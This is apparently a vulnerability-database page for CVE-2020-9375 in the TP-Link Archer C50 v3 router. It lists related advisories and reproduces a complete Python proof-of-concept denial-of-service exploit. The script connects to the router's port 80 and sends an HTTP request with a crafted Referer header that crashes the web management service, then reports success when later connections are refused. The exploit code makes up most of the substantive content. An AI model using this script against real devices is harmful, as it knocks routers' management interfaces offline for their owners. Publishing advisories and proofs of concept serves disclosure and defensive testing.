Lucene search
K

TP-Link Archer C50 V3 Denial of Service

🗓️ 26 Mar 2020 00:00:00Reported by thewhiteh4tType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 174 Views

TP-Link Archer C50 v3 DoS vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
TP-Link Archer C50 3 - Denial of Service Exploit
26 Mar 202000:00
zdt
Circl
CVE-2020-9375
18 Oct 202416:21
circl
CNVD
TP-Link Archer C50 Denial of Service Vulnerability
26 Mar 202000:00
cnvd
CVE
CVE-2020-9375
25 Mar 202014:17
cve
Cvelist
CVE-2020-9375
25 Mar 202014:17
cvelist
Exploit DB
TP-Link Archer C50 3 - Denial of Service (PoC)
26 Mar 202000:00
exploitdb
exploitpack
TP-Link Archer C50 3 - Denial of Service (PoC)
26 Mar 202000:00
exploitpack
NVD
CVE-2020-9375
25 Mar 202015:15
nvd
OSV
CVE-2020-9375
25 Mar 202015:15
osv
Prion
Design/Logic Flaw
25 Mar 202015:15
prion
Rows per page
`# Exploit Title: TP-Link Archer C50 v3 Denial of Service  
# Date: 25-01-2020  
# Exploit Author: thewhiteh4t  
# Vendor Homepage: https://www.tp-link.com/  
# Version: TP-Link Archer C50 v3 Build 171227  
# Tested on: Arch Linux x64  
# CVE: CVE-2020-9375  
# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html  
  
import time  
import socket  
  
ip = '192.168.0.1'  
port = 80  
  
print('[+] IP : ' + ip)  
print('[+] Port : ' + str(port))  
  
for i in range(2):  
time.sleep(1)  
try:  
print('[+] Initializing Socket...')  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.settimeout(5)  
print('[!] Connecting to target...')  
s.connect((ip, port))  
header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip)  
header = header.encode()  
print('[!] Sending Request...')  
s.sendall(header)  
print('[!] Disconnecting Socket...')  
s.close()  
if i == 1:  
print('[-] Exploit Failed!')  
break  
except Exception as e:  
if 'Connection refused' in str(e):  
print('[+] Connection Refused...Exploit Successful!')  
break  
else:  
print('[-] Exploit Failed!')  
break  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2020 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.28044
174